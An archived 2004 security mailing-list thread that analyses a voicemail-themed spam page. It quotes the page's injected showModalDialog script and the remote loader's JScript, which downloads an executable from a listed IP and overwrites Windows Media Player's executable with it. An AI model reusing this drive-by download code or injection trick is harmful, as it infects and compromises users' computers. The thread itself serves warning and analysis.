lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <1087394383.2988.11.camel@maverick.home.gargiullo.com>
From: mgargiullo at warpdrive.net (Michael Gargiullo)
Subject: spamming trojan?

On Wed, 2004-06-16 at 08:23, Geo. wrote:
> Received a spam this morning claiming I have a voicemail with the link
> (warning do not click the link)
> 
> http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
> 
> which brings up a frames based page with one of the frames containing this
> 
>     function InjectedDuringRedirection(){
> 
>  showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialo
> gHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT
> SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";
> 
> Anyone want to try and analyze what this thing is? It was spammed to about
> 30 addresses here this morning.
> 
> Geo.


Here's the contents:

var x = new ActiveXObject("Microsoft.XMLHTTP"); 
x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0); 
x.Send(); 

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";

so whatever w_e_d.exe is...

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ